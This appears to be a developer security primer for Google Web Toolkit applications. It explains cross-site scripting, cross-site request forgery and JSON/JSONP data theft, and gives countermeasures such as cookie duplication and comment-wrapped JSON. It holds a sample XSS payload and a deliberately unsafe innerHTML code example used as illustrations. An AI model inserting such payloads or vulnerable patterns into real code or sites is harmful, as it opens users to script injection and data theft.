It's not hard to imagine an attacker putting something worse than a mere JavaScript alert in that URL. It's also probably not hard to imagine how easy it is for your real-world, more complex server-side code to accidentally contain such vulnerabilities. Perhaps the scariest thing of all is that an evil URL like the one above can exploit your servers entirely without your involvement.
The solution is usually simple: you just have to make sure that you escape or strip the content any time you write user input back into a new page. Like many things though, that's easier said than done, and requires constant vigilance.
It would be nice if we could wrap up this article at this point. Unfortunately, we can't. You see, there's a whole other class of attack that we haven't covered yet.
You can think of this one almost as XSS in reverse. In this scenario, the attacker lures one of your users to their own site, and uses their browser to attack your server. The key to this attack is insecure server-side session management.
Probably the most common way that web sites manage sessions is via browser cookies. Typically the server will present a login page to the user, who enters credentials like a user name and password and submits the page. The server checks the credentials and if they are correct, sets a browser session cookie. Each new request from the browser comes with that cookie. Since the server knows that no other web site could have set that cookie (which is true due to the browsers' Same-Origin Policy,) the server knows the user has previously authenticated.
The problem with this approach is that session cookies don't expire when the user leaves the site (they expire either when the browser closes or after some period of time). Since the browsers will include cookies with any request to your server regardless of context, if your users are logged in, it's possible for other sites to trigger an action on your server. This is frequently referred to as "Cross-Site Request Forging" or XSRF (or sometimes CSRF).
The sites most vulnerable to XSRF attacks, perhaps ironically, are those that have already embraced the service-oriented model. Traditional non-AJAX web applications are HTML-heavy and require multi-page UI operations by their very nature. The Same-Origin Policy prevents an XSRF attacker from reading the results of its request, making it impossible for an XSRF attacker to navigate a multi-page process. The simple technique of requiring the user to click a confirmation button -- when properly implemented -- is enough to foil an XSRF attack.
Unfortunately, eliminating those sorts of extra steps is one of the key goals of the AJAX programming model. AJAX lets an application's UI logic run in the browser, which in turn lets communications with the server become narrowly defined operations. For instance, you might develop corporate HR application where the server exposes a URL that lets browser clients email a user's list of employee data to someone else. Such services are operation-oriented, meaning that a single HTTP request is all it takes to do something.
Since a single request triggers the operation, the XSRF attacker doesn't need to see the response from an XMLHTTPRequest-style service. An AJAX-based HR site that exposes "Email Employee Data" as such a service could be exploited via an XSRF attack that carefully constructed a URL that emails the employee data to an attacker. As you can see, AJAX applications are a lot more vulnerable to an XSRF attack than a traditional web site, because the attacking page doesn't need to navigate a multi-page sequence after all.
So far we've seen the one-two punch from XSS and XSRF. Sadly, there's still more. These days, JSON (JavaScript Object Notation) is the new hotness -- and indeed, it's very hot. It's a clever, even elegant, technique. It also performs well, since it uses low-level (meaning: fast) browser support to handle parsing. It's also easy to program to, since the result is a JavaScript object, meaning you get object serialization almost for free. Unfortunately, with this powerful technique comes very substantial risks to your code; if you choose to use JSON with your GWT application, it's important to understand those risks.
At this point, you'll need to understand JSON; check out the json.org site if you aren't familiar with it yet. A cousin of JSON is "JSON with Padding" or JSONP, so you'll also want to be familiar with that. Here's the earliest discussion of JSONP that we could find: Remote JSON - JSONP.
As bad as XSS and XSRF are, JSON gives them room to breathe, so to speak, which makes them even more dangerous. The best way to explain this is just to describe how JSON is used. There are three forms, and each is vulnerable to varying degrees:
[ 'foo', 'bar' ]
{ 'data': ['foo', 'bar'] }
var result = { 'data': ['foo', 'bar'] };
handleResult({'data': ['foo', 'bar']});
The last two examples are most useful when returned from a server as the response to a <script> tag inclusion. This could use a little explanation. Earlier text described how JavaScript is permitted to dynamically add <img> tags pointing to images on remote sites. The same is true of <script> tags: JavaScript code can dynamically insert new <script> tags that cause more JavaScript code to load.
This makes dynamic <script> insertion a very useful technique, especially for mashups. Mashups frequently need to fetch data from different sites, but the Same-Origin Policy prevents them from doing so directly with an XMLHTTPRequest call. However, currently-running JavaScript code is trusted to load new JavaScript code from different sites -- and who says that code can't actually be data?
This concept might seem suspicious at first since it seems like a violation of the Same-Origin restriction, but it really isn't. Code is either trusted or it's not. Loading more code is more dangerous than loading data, so since your current code is already trusted to load more code, why should it not be trusted to load data as well? Meanwhile, <script> tags can only be inserted by trusted code in the first place, and the entire meaning of trust is that... you trust it to know what it's doing. It's true that XSS can abuse trust, but ultimately XSS can only originate from buggy server code. Same-Origin is based on trusting the server -- bugs and all.
So what does this mean? How is writing a server-side service that exposes data via these methods vulnerable? Well, other people have explained this a lot better than we can cover it here. Here are some good treatments:
Go ahead and read those -- and be sure to follow the links! Once you've digested it all, you'll probably see that you should tread carefully with JSON -- whether you're using GWT or another tool.
But this is an article for GWT developers, right? So how are GWT developers affected by these things? The answer is that we are no less vulnerable than anybody else, and so we have to be just as careful. The sections below describe how each threat impacts GWT in detail.
Also see SafeHtml – Provides coding guidelines with examples showing how to protect your application from XSS vulnerabilities due to untrusted data
XSS can be avoided if you rigorously follow good JavaScript programming practices. Since GWT helps you follow good JavaScript practices in general, it can help you with XSS. However, GWT developers are not immune, and there simply is no magic bullet.
Currently, we believe that GWT isolates your exposure to XSS attacks to these vectors:
innerHTMLon GWT Widget objects
document.write, etc.)
Don't take our word for it, though! Nobody's perfect, so it's important to always keep security on your mind. Don't wait until your security audit finds a hole, think about it constantly as you code.
Read on for more detail on the four vectors above.
Many developers use GWT along with other JavaScript solutions. For instance, your application might be using a mashup with code from several sites, or you might be using a third-party JavaScript-only library with GWT. In these cases, your application could be vulnerable due to those non-GWT libraries, even if the GWT portion of your application is secure.
If you are mixing other JavaScript code with GWT in your application, it's important that you review all the pieces to be sure your entire application is secure.
It's a common technique to fill out the bodies of tables, DIVs, frames, and similar UI elements with some static HTML content. This is most easily accomplished by assigning to the innerHTML attribute on a JavaScript object. However, this can be risky since it allows evil content to get inserted directly into a page.
Here's an example. Consider this basic JavaScript page:
<html> <head> <script language="JavaScript"> function fillMyDiv(newContent) { document.getElementById('mydiv').innerHTML = newContent; } </script> </head> <body> <p>Some text before mydiv.</p> <div id="mydiv"></div> <p>Some text after mydiv.</p> </body> </html>
The page contains a placeholder <div> named 'mydiv', and a JavaScript function that simply sets innerHTML on that div. The idea is that you would call that function from other code on your page whenever you wanted to update the content being displayed. However, suppose an attacker contrives to get a user to pass in this HTML as the 'newContent' variable:
<div onmousemove="alert('Hi!');">Some text</div>
Whenever the user mouses over 'mydiv', an alert will appear. If that's not frightening enough, there are other techniques -- only slightly more complicated -- that can execute code immediately without even needing to wait for user input. This is why setting innerHTML can be dangerous; you've got to be sure that the strings you use are trusted.
It's also important to realize that a string is not necessarily trusted just because it comes from your server! Suppose your application contains a report, which has "edit" and "view" modes in your user interface. For performance reasons, you might generate the custom-printed report in plain-old HTML on your server. Your GWT application would display it by using a
RequestCallback to fetch the HTML and assign the result to a table cell's innerHTML property. You might assume that that string is trusted since your server generated it, but that could be a bad assumption. If the user is able to enter arbitrary input in "edit" mode, an attacker could use any of a variety of attacks to get the user to store some unsafe HTML in a record. When the user views the record again, that record's HTML would be evil.
Unless you do an extremely thorough analysis of both the client and server, you can't assume a string from your server is safe. To be truly safe, you may want to always assume that strings destined for innerHTML or eval are unsafe, but at the very least you've got to Know Your Code.
This is a very similar scenario to setting innerHTML, although with arguably worse implications. Suppose that you have the same example as the one just described, except that instead of returning HTML content, the server sends the report data to the browser as a JSON string. You would normally pass that string to GWT's JSONParser class. For performance reasons, though, that string calls eval(). It's important to be sure that the code you are passing doesn't contain evil code.
An attacker could again use one of several attacks to cause the user to save carefully-constructed JavaScript code into one of your data records. That code could contain evil side effects that take effect immediately when the JSON object is parsed. This is just as severe as innerHTML but is actually easier to do since the attacker doesn't need to play tricks with HTML in the evil string -- he can just use plain JavaScript code.
As with innerHTML, it's not always correct to assume that a JSON string is safe simply because it came from your server. At the very least, it is important to think carefully before you use any JSON service, whether it's yours or a third party's.
GWT has little control over or insight into JSNI code you write. If you write JSNI code, it's important to be especially cautious. Calling the eval function or setting innerHTML should set off red flags immediately, but you should always think carefully as you write code.
For instance, if you're writing a custom Widget that includes a hyperlink, you might include a
setURL(String) method. If you do, though, you should consider adding a test to make sure that the new URL data doesn't actually contain a
"javascript:" URL. Without this test, your setURL method could create a new vector for XSS code to get into your application. This is just one possible example; always think carefully about unintended effects when you use JSNI.
As a GWT user, you can help reduce XSS vulnerabilities in your code by following these guidelines:
The GWT team is considering adding support for standard string inspection to the GWT library. You would use this to validate any untrusted string to determine if it contains unsafe data (such as a <script> tag.) The idea is that you'd use this method to help you inspect any strings you need to pass to innerHTML or eval. However, this functionality is only being considered right now, so for the time being it's still important to do your own inspections. Be sure to follow the guidelines above -- and be sure to be paranoid!
Also see GWT RPC XSRF protection – Explains how to protect GWT RPCs against XSRF attacks using RPC tokens introduced in GWT 2.3.
You can take steps to make your GWT application less vulnerable to XSRF attacks. The same techniques that you might use to protect other AJAX code will also work to protect your GWT application.
A common countermeasure for XSRF attacks involves duplicating a session cookie. Earlier, we discussed how the usual cookie-based session management model leaves your application open to XSRF attacks. An easy way to prevent this is to use JavaScript to copy the cookie value and submit it as form data along with your XMLHTTPRequest call. Since the browser's Same-Origin Policy will prevent a third-party site from accessing the cookies from your site, only your site can retrieve your cookie. By submitting the value of the cookie along with the request, your server can compare the actual cookie value with the copy you included; if they don't match, your server knows that the request is an XSRF attempt. Simply put, this technique is a way of requiring the code that made the request to prove that it has access to the session cookie.
If you are using the RequestBuilder and RequestCallback classes in GWT, you can implement XSRF protection by setting a custom header to contain the value of your cookie. Here is some sample code:
RequestBuilder rb = new RequestBuilder(RequestBuilder.POST, url); rb.setHeader("X-XSRF-Cookie", Cookies.getCookie("myCookieKey")); rb.sendRequest(null, myCallback);
If you are using GWT's RPC mechanism, the solution is unfortunately not quite as clean. However, there are still several ways you can accomplish it. For instance, you can add an argument to each method in your RemoteService interface that contains a String. That is, if you wanted this interface:
public interface MyInterface extends RemoteService { public boolean doSomething(); public void doSomethingElse(String arg); }
...you could actually use this:
public interface MyInterface extends RemoteService { public boolean doSomething(String cookieValue); public void doSomethingElse(String cookieValue, String arg); }
When you call the method, you would pass in the current cookie value that you fetch using
Cookies.getCookie(String).
If you prefer not to mark up your
RemoteService interfaces in this way, you can do other things instead. You might modify your data-transfer objects to have a field name containing the
cookieValue, and set that value whenever you create them. Perhaps the simplest solution is to simply add the cookie value to your URL as a
GET parameter. The important thing is to get the cookie value up to the server, somehow.
In all of these cases, of course, you'll have to have your server-side code compare the duplicate value with the actual cookie value and ensure that they're the same.
The GWT team is also considering enhancing the RPC system to make it easier to prevent XSRF attacks. Again though, that will only appear in a future version, and for now you should take precautions on your own.
Attacks against JSON and JSONP are pretty fundamental. Once the browser is running the code, there's nothing you can do to stop it. The best way to protect your server against JSON data theft is to avoid sending JSON data to an attacker in the first place.
That said, some people advise JSON developers to employ an extra precaution besides the cookie duplication XSRF countermeasure. In this model, your server code would wrap any JSON response strings within JavaScript block comments. For example, instead of returning
['foo', 'bar'] you would instead return
/*['foo', 'bar']*/.
The client code is then expected to strip the comment characters prior to passing the string to the eval function.
The primary effect of this is that it prevents your JSON data from being stolen via a <script> tag. If you normally expect your server to export JSON data in response to a direct XMLHTTPRequest, this technique would prevent attackers from executing an XSRF attack against your server and stealing the response data via one of the attacks linked to earlier.
If you only intend your JSON data to be returned via an XMLHTTPRequest, wrapping the data in a block comment prevents someone from stealing it via a <script> tag. If you are using JSON as the data format exposed by your own services and don't intend servers in other domains to use it, then there is no reason not to use this technique. It might keep your data safe even in the event that an attacker manages to forge a cookie.
You should also use the XSRF cookie-duplication countermeasure if you're exposing services for other mashups to use. However, if you're building a JSONP service that you want to expose publicly, the second comment-block technique we just described will be a hindrance.
The reason is that the comment-wrapping technique works by totally disabling support for <script> tags. Since that is at the heart of JSONP, it disables that technique. If you are building a web service that you want to be used by other sites for in-browser mashups, then this technique would prevent that.
Conversely, be very careful if you're building mashups with someone else's site! If your application is a "JSON consumer" fetching data from a different domain via dynamic <script> tags, you are exposed to any vulnerabilities they may have. If their site is compromised, your application could be as well. Unfortunately, with the current state of the art, there isn't much you can do about this. After all -- by using a <script> tag, you're trusting their site. You just have to be sure that your trust is well-placed.
In other words, if you have critical private information on your own server, you should probably avoid in-browser JSONP-style mashups with another site. Instead, you might consider building your server to act as a relay or proxy to the other site. With that technique, the browser only communicates with your site, which allows you to use more rigorous protections. It may also provide you with an additional opportunity to inspect strings for evil code.
Web 2.0 can be a scary place. Hopefully we've given you some food for thought and a few techniques you can implement to keep your users safe. Mostly, though, we hope we've instilled a good healthy dose of paranoia in you. If Benjamin Franklin were alive today, he might add a new "certainty" to his famous list: death, taxes... and people trying to crack your site. The only thing we can be sure of is that there will be other exploits in the future, so paranoia will serve you well over time.
As a final note, we'd like to stress one more time the importance of staying vigilant. This article is not an exhaustive list of the security threats to your application. This is just a primer, and someday it could become out of date. There may also be other attacks which we're simply unaware of. While we hope you found this information useful, the most important thing you can do for your users' security is to keep learning, and stay as well-informed as you can about security threats.
As always, if you have any feedback for us or would like to discuss this issue — now or in the future — please visit our GWT Developer Forum.
|
http://www.gquery.org/articles/security_for_gwt_applications.html
|
CC-MAIN-2018-09
|
refinedweb
| 4,952
| 60.65
|
Type: Posts; User: wbport
function playOne() {
var randSum=0;
for (var i=0; i < 20; i++)
randSum+= Math.random();
return (randSum * 0.7748) - 7.748;
} might work
Sorry, I missed the [i] in the original post.
Are you getting your checkboxes and radio buttons mixed up? Checkboxes are stand alone as to whether they are checked or not but radio buttons come in sets. This round robin generator has several...
Try this resourse: I use it for a slideshow of cats: cats on a garden chessboard.
Changing it to "onkeydown" seemed to do it as the quirksmode website suggested--that was the same thing as in the sudoku puzzle. Guyon Roche wrote the webpage--I only have a few tweaks in his code...
I am trying to get the following to work in a timesheet page:
document.onkeypress = keyHit;
function keyHit(evt) {
var e = evt || window.event;
if (document.timeform.DeBugging.checked==false) {...
This is one idea:
var Characters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZOI"
var PassWord=""
for (var i=0; i < 8; i++) {
var rnd = Math.floor(Math.random() *...
This a working example in a Sukolu solver. It shows start, details, solver, and about with only one div showing at a time.
What do you have in (body onload="???") Works fine here: cats.
If I were a teacher I'd probably have access to better ways to display formulas like that, but just saving room for the (new) first term after the equal sign was tricky enough.
Many thanks! The whole (new) page is InterestTheory.html.
In the following code snippet:
html>
<head>
<title>Calculating Loan Payments</title>
</head>
<body>
<center><h1>Calculating Loan Payments</h1></center>
<center><table style="font-size:...
Code could also be added to the script the submit button triggers to check for filled out fields first.
I have a webpage that shows the math behind the payment for a loan InterestTheory.html. I am able to change the type size for ordinary text but how can I change it for the table entries where I show...
Got it. I ran the random function 20 times, summing the results. After tweaking the factor by running it 100,000 times, I got:
<html><head><title>Rubato test</title>
<script...
I need help converting a Math.random() number into something that would simulate the distribution curve. For example, if the mean were 10.0 and a standard distribution was 1.0, the returned random...
I have a few minor tweaks to a program Guyon Roche wrote a few years back: sudoku.htm.
I added the following code
var j;
document.onkeypress = keyHit;
function keyHit(evt) {
var e = evt || window.event;
if (document.timeform.DeBugging.checked==false) {
j=0;
return true; }...
I have a simple timesheet calculator and, since it would be used with the numeric keypad on the right, how could I produce intermediate results and go to the next field when the Enter or + key was...
I have been tweaking the following for several years now. The amortization table will be created by the P.I. button after the monthly amount has been created. mortgage.htm. The monthly amount is...
To do simple interest for a year, the formula is trivial. Convert the interest from percent to decimal (e.g., 5% = 0.05) and the formula is (1 + i) * amount to be compounded. For more years...
I looked at "script.js" in your link and line 33 has a warning which appears on mouseover.
This code can read and return the selected radio button:
function readStrum() {
var sel = document.getElementsByName("A1");
for (var i=0; i<sel.length; i++) {
if (sel[i].checked ==...
Remember how you were taught long division as a youngster? Try writing a program to do the same thing. If it will work on smaller numbers you can verify with the modulo operator, it should work on...
This is my entry:
function eventTable(eYr,eMo,eDa,eText) {
this.date = new Date(eYr, eMo-1, eDa, 15, 0); // Time set at 3pm. In JavaScript, months are from 0 (Jan) to 11 (Dec) so 1 is...
|
http://www.webdeveloper.com/forum/search.php?s=3a627f949cf4830e0d03af7c4d99b660&searchid=3309361
|
CC-MAIN-2014-15
|
refinedweb
| 676
| 68.67
|
The Storage Team Blog about file services and storage features in Windows Server, Windows XP, and Windows Vista.
So you have heard about a tool DFSDiag which is meant to be used to help you diagnose your DFS Namespace. You just type DFSDiag.exe and...
voilà you got the list of the commands you can use. Oh yes you also have the “DFSDIAG_ERROR” message, but that’s because DFSDiag expect one of the commands that it has implemented. Ok let me try to explain the options you have:
/testdcs: With this you can check the configuration of the domain controllers. It performs the following tests:
To run this command against your domain Contoso.com just type:
DFSDiag /testdcs /domain:Contoso.com
If you omit the parameter /Domain, the tests are run against the Domain the machine is joined to.
Server
For a folder (link):
DFSDiag /testsites /dfspath:\\Contoso.com\MyNamespace\MyLink /full
For a root:
DFSDiag /testsites /dfspath:\\Contoso.com\MyNamespace /recurse /full
But hey what’s the meaning of “recurse” and “full”? Don’t panic these are a couple of parameters that run a more comprehensive test. /recurse applies only to a namespace root path, where it enumerates and verifies the site associations for all folder targets. /full verifies that AD DS and the registry of the server contain the same site association information
/testdfsconfig: With this you can check the DFS namespace configuration. The tests that perform are:
To run this you just need to type:
DFSDiag /testdfsconfig /dfsroot:\\Contoso.com\MyNamespace
/testdfsintegrity: Used to check the namespace integrity. The tests performed are:
To check the integrity of my namespace at contoso.com:
DFSDiag /testdfsintegrity /dfsroot:\\Contoso.com\MyNamespace.
Again for your namespace at contoso.com:
DFSDiag /testreferral /dfspath:\\Contoso.com\MyNamespace
There is also the option to use /full as an optional parameter, but this only applies to Domain and Root referrals. In these cases /full verifies the consistency of site association information between the registry and Active Directory.
A brief example of how DFSDiag can help you is to detect duplicate folders (links) in your deployment. For this you can use the command /testdfsintegrity with the /full flag and…
It will show you the “troublemaker” folders as in this case, where Link1 and Link2 are duplicated.
Ok these are the tests that DFSDiag performs; I hope this gives you a better understanding of what’s going on once you run the tool against your deployment!
See you,
John Angel Diaz
Our developer team colleagues at the File Cabinet have posted an interesting article on the DFSDIAG tool.
dfsdiag /testdcs gives an error on the last test of "Validating Site Association of <DC> in every DC." It provides the error "DFSDIAG_WARNING - APPL - SiteName form IP - ::1 of <DC> in DC - <remote DC) is nULL while in ADSite it is <SiteName>. This error repeats for every non-W2K8 DC in the domain. I have unbound IPV6 and unchecked the IPv6 protocol, but the problem still is reported. Why?
Hi Brian,
Could you check if the site association of DC by hostname and IP address is the same across all other DCs?
does DFSdiag only work on 2008 Server, or can you use it on 2003 server? It seems to be an improvement of the dfsrdiag.exe tool.
TIA,
I checked the Sites/subnets. All the DCs in the domain are in the same site. The only difference is that the two DCs that have the warning are W2K3 and the one that is consistent is W2K8.
Hi
Great reading your info on DFS and DFS Replication.
With the replication are files verified as they are copied or is it dependant on later checks.
Tom Cross
Heya
Since blogs on the site thumbs up :)
I have the exact same issue with the "is nULL while in ADSite it is <SiteName>. "
Not on the Domain controllers but on one of our Mgmnt machins, and it can not access the DFSroot. Also unbound the IP6 interface, and tone tons of dfsutil/dfsdiag. All rendering in RPC server in unavailable.
Before i unbounded the ip6 interface i did not have ::1 as ipaddress but instead the "deafult" ip6 IP net
Best regards
Trademarks |
Privacy Statement
|
http://blogs.technet.com/filecab/archive/2008/10/24/what-does-dfsdiag-do.aspx
|
crawl-002
|
refinedweb
| 703
| 55.95
|
You can use a negative number to count from the end of the sequence too. The step may also be negative, but in this case the start index must be bigger than the stop index resulting in a reverse slice. This used to be the only way to reverse a sequence before the reversed() built-in function was introduced in Python 2.4 (yes, you get some history for the same price).
Now let's break some bread and slice it too.
# prepare a list called bread with 10 integers
bread = range(1,11)
print bread
# plain slice
print bread[1:10:2]
# slice using negative indices
print bread[-9:-7]
# old way of reversing a sequence
print bread[::-1]
[1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
[2, 4, 6, 8, 10]
[2, 3]
[10, 9, 8, 7, 6, 5, 4, 3, 2, 1]
I can hear you thinking: "What's the big deal about arrays? Didn't we have them back in the day in BASIC for the Dragon32?". Well, you didn't have THAT kind of array. Multi-dimensional arrays (tensors) are a crucial building block for many scientific computations. NumPy is a very important and influential package that single-handedly made Python a great success in the scientific community. As evidence of its importance, NumPy is slated for inclusion in the standard Python library at some point.
NumPy uses its own data types (remember the ctypes data types?) to represent integers with higher fidelity than Python's native int and long. These types were not usable for slicing, which is very common in NumPy. The most viable solution was to allow arbitrary types to be used as slicing indices if they define an __index__ method whose return value is int or long. In the following code I defined a few classes with __index__ methods that I use to dice and slice a poor 'bread.'
class One(object):
def __index__(self):
return 1
class Two(object):
def __index__(self):
return 2
class Ten(object):
def __index__(self):
return 10
print bread[One():Ten():Two()]
one = One()
two = Two()
ten = Ten()
print x[one:ten:two]
[2, 4, 6, 8, 10]
[2, 4, 6, 8, 10]
Advertiser Disclosure:
|
http://www.devx.com/opensource/Article/33480/0/page/2
|
CC-MAIN-2020-50
|
refinedweb
| 372
| 67.89
|
Given 2 arrays
Array1 = {a,b,c...n} and
Array2 = {10,20,15....x} how can I generate all possible combination as Strings a(i) b(j) c(k) n(p)
where
1 <= i <= 10, 1 <= j <= 20 , 1 <= k <= 15, .... 1 <= p <= x
Such as:
a1 b1 c1 .... n1 a1 b1 c1..... n2 ...... ...... a10 b20 c15 nx (last combination)
So in all total number of combination = product of elements of
array2 =
(10 X 20 X 15 X ..X x)
Similar to a Cartesian product, in which the second array defines the upper limit for each element in first array.
Example with fixed numbers,
Array x = [a,b,c] Array y = [3,2,4]
So we will have 3*2*4 = 24 combinations. Results should be:
a1 b1 c1 a1 b1 c2 a1 b1 c3 a1 b1 c4 a1 b2 c1 a1 b2 c2 a1 b2 c3 a1 b2 c4 a2 b1 c1 a2 b1 c2 a2 b1 c3 a2 b1 c4 a2 b2 c1 a2 b2 c2 a2 b2 c3 a2 b2 c4 a3 b1 c1 a3 b1 c2 a3 b1 c3 a3 b1 c4 a3 b2 c1 a3 b2 c2 a3 b2 c3 a3 b2 c4 (last)
using System; using System.Text; public static string[] GenerateCombinations(string[] Array1, int[] Array2) { if(Array1 == null) throw new ArgumentNullException("Array1"); if(Array2 == null) throw new ArgumentNullException("Array2"); if(Array1.Length != Array2.Length) throw new ArgumentException("Must be the same size as Array1.", "Array2"); if(Array1.Length == 0) return new string[0]; int outputSize = 1; var current = new int[Array1.Length]; for(int i = 0; i < current.Length; ++i) { if(Array2[i] < 1) throw new ArgumentException("Contains invalid values.", "Array2"); if(Array1[i] == null) throw new ArgumentException("Contains null values.", "Array1"); outputSize *= Array2[i]; current[i] = 1; } var result = new string[outputSize]; for(int i = 0; i < outputSize; ++i) { var sb = new StringBuilder(); for(int j = 0; j < current.Length; ++j) { sb.Append(Array1[j]); sb.Append(current[j].ToString()); if(j != current.Length - 1) sb.Append(' '); } result[i] = sb.ToString(); int incrementIndex = current.Length - 1; while(incrementIndex >= 0 && current[incrementIndex] == Array2[incrementIndex]) { current[incrementIndex] = 1; --incrementIndex; } if(incrementIndex >= 0) ++current[incrementIndex]; } return result; }
Sure thing. It is a bit tricky to do this with LINQ but certainly possible using only the standard query operators.
UPDATE: This is the subject of my blog on Monday June 28th 2010; thanks for the great question. Also, a commenter on my blog noted that there is an even more elegant query than the one I gave. I’ll update the code here to use it.
The tricky part is to make the Cartesian product of arbitrarily many sequences. “Zipping” in the letters is trivial compared to that. You should study this to make sure that you understand how it works. Each part is simple enough but the way they are combined together takes some getting used to:}) ); }
To explain how this works, first understand what the “accumulate” operation is doing. The simplest accumulate operation is “add everything in this sequence together”. The way you do that is: start with zero. For each item in the sequence, the current value of the accumulator is equal to the sum of the item and previous value of the accumulator. We’re doing the same thing, except that instead of accumulating the sum based on the sum so far and the current item, we’re accumulating the Cartesian product as we go.
The way we’re going to do that is to take advantage of the fact that we already have an operator in LINQ that computes the Cartesian product of two things:
from x in xs from y in ys do something with each possible (x, y)
By repeatedly taking the Cartesian product of the accumulator with the next item in the input sequence and doing a little pasting together of the results, we can generate the Cartesian product as we go.
So think about the value of the accumulator. For illustrative purposes I’m going to show the value of the accumulator as the results of the sequence operators it contains. That is not what the accumulator actually contains. What the accumulator actually contains is the operators that produce these results. The whole operation here just builds up a massive tree of sequence operators, the result of which is the Cartesian product. But the final Cartesian product itself is not actually computed until the query is executed. For illustrative purposes I’ll show what the results are at each stage of the way but remember, this actually contains the operators that produce those results.
Suppose we are taking the Cartesian product of the sequence of sequences
{{1, 2}, {3, 4}, {5, 6}}. The accumulator starts off as a sequence containing one empty sequence:
{ { } }
On the first accumulation, accumulator is { { } } and item is {1, 2}. We do this:
from accseq in accumulator from item in sequence select accseq.Concat(new[] {item})
So we are taking the Cartesian product of
{ { } } with
{1, 2}, and for each pair, we concatenate: We have the pair
({ }, 1), so we concatenate
{ } and
{1} to get
{1}. We have the pair
({ }, 2}), so we concatenate
{ } and
{2} to get
{2}. Therefore we have
{{1}, {2}} as the result.
So on the second accumulation, accumulator is
{{1}, {2}} and item is
{3, 4}. Again, we compute the Cartesian product of these two sequences to get:
{({1}, 3), ({1}, 4), ({2}, 3), ({2}, 4)}
and then from those items, concatenate the second one onto the first. So the result is the sequence
{{1, 3}, {1, 4}, {2, 3}, {2, 4}}, which is what we want.
Now we accumulate again. We take the Cartesian product of the accumulator with
{5, 6} to get
{({ 1, 3}, 5), ({1, 3}, 6), ({1, 4}, 5), ...
and then concatenate the second item onto the first to get:
{{1, 3, 5}, {1, 3, 6}, {1, 4, 5}, {1, 4, 6} ... }
and we’re done. We’ve accumulated the Cartesian product.
Now that we have a utility function that can take the Cartesian product of arbitrarily many sequences, the rest is easy by comparison:
var arr1 = new[] {"a", "b", "c"}; var arr2 = new[] { 3, 2, 4 }; var result = from cpLine in CartesianProduct( from count in arr2 select Enumerable.Range(1, count)) select cpLine.Zip(arr1, (x1, x2) => x2 + x1);
And now we have a sequence of sequences of strings, one sequence of strings per line:
foreach (var line in result) { foreach (var s in line) Console.Write(s); Console.WriteLine(); }
Easy peasy!
Alternative solution:
Step one: read my series of articles on how to generate all strings which match a context sensitive grammar:
Step two: define a grammar that generates the language you want. For example, you could define the grammar:
S: a A b B c C A: 1 | 2 | 3 B: 1 | 2 C: 1 | 2 | 3 | 4
Clearly you can easily generate that grammar definition string from your two arrays. Then feed that into the code which generates all strings in a given grammar, and you’re done; you’ll get all the possibilities. (Not necessesarily in the order you want them in, mind you.)
For comparison, here is a way to do it with Python
from itertools import product X=["a", "b", "c"] Y=[3, 4, 2] terms = (["%s%s"%(x,i+1) for i in range(y)] for x,y in zip(X,Y)) for item in product(*terms): print " ".join(item)
Fon another solution not linq based you can use:
public class CartesianProduct<T> { int[] lengths; T[][] arrays; public CartesianProduct(params T[][] arrays) { lengths = arrays.Select(k => k.Length).ToArray(); if (lengths.Any(l => l == 0)) throw new ArgumentException("Zero lenght array unhandled."); this.arrays = arrays; } public IEnumerable<T[]> Get() { int[] walk = new int[arrays.Length]; int x = 0; yield return walk.Select(k => arrays[x++][k]).ToArray(); while (Next(walk)) { x = 0; yield return walk.Select(k => arrays[x++][k]).ToArray(); } } private bool Next(int[] walk) { int whoIncrement = 0; while (whoIncrement < walk.Length) { if (walk[whoIncrement] < lengths[whoIncrement] - 1) { walk[whoIncrement]++; return true; } else { walk[whoIncrement] = 0; whoIncrement++; } } return false; } }
You can find an example on how to use it here.
I’m not willing to give you the complete source code. So here’s the idea behind.
You can generate the elements the following way:
I assume
A=(a1, a2, ..., an) and
B=(b1, b2, ..., bn) (so
A and
B each hold
n elements).
Then do it recursively! Write a method that takes an
A and a
B and does your stuff:
If
A and
B each contain just one element (called
an resp.
bn), just iterate from 1 to
bn and concatenate
an to your iterating variable.
If
A and
B each contain more then one element, grab the first elements (
a1 resp
b1), iterate from 1 to
bn and do for each iteration step:
- call the method recursively with the subfields of
Aand
Bstarting at the second element, i.e.
A'=(a2, a3, ..., an)resp
B'=(b2, b3, ..., bn). For every element generated by the recursive call, concatenate
a1, the iterating variable and the generated element from the recursive call.
Here you can find an analouge example of how to generate things in C#, you “just” have to adapt it to your needs.
If I am getting it right, you are after something like Cartesian product.
If this is the case here is you how you can do this using LINQ. Might not be exact answer but try to get the idea
char[] Array1 = { 'a', 'b', 'c' }; string[] Array2 = { "10", "20", "15" }; var result = from i in Array1 from j in Array2 select i + j;
These Articles might help
The finalResult is the desired array. Assumed the both arrays are of same size.
char[] Array1 = { 'a', 'b', 'c' }; int[] Array2 = { 3, 2, 4 }; var finalResult = new List<string>(); finalResult.Add(String.Empty); for(int i=0; i<Array1.Length; i++) { var tmp = from a in finalResult from b in Enumerable.Range(1,Array2[i]) select String.Format("{0} {1}{2}",a,Array1[i],b).Trim(); finalResult = tmp.ToList(); }
I think this will suffice.
Here’s is a javascript version, which I’m sure someone can convert. It has been tested thoroughly.
function combinations (Asource){ var combos = []; var temp = []; var picker = function (arr, temp_string, collect) { if (temp_string.length) { collect.push(temp_string); } for (var i=0; i<arr.length; i++) { var arrcopy = arr.slice(0, arr.length); var elem = arrcopy.splice(i, 1); if (arrcopy.length > 0) { picker(arrcopy, temp_string.concat(elem), collect); } else { collect.push(temp_string.concat(elem)); } } } picker(Asource, temp, combos); return combos; } var todo = ["a", "b", "c", "d"]; // 5 in this set var resultingCombos = combinations (todo); console.log(resultingCombos);
I just discovered this CodeProject posting that includes a Facets.Combinatorics namespace containing some useful code to handle Permuations, Combinations and Variations in C#.
Fon another solution not linq based, more effective:
static IEnumerable<T[]> CartesianProduct<T>(T[][] arrays) { int[] lengths; lengths = arrays.Select(a => a.Length).ToArray(); int Len = arrays.Length; int[] inds = new int[Len]; int Len1 = Len - 1; while (inds[0] != lengths[0]) { T[] res = new T[Len]; for (int i = 0; i != Len; i++) { res[i] = arrays[i][inds[i]]; } yield return res; int j = Len1; inds[j]++; while (j > 0 && inds[j] == lengths[j]) { inds[j--] = 0; inds[j]++; } } }
|
https://exceptionshub.com/generating-all-possible-combinations.html
|
CC-MAIN-2021-21
|
refinedweb
| 1,891
| 64.51
|
[ ]
Requirements and Host Configuration¶
Overview¶
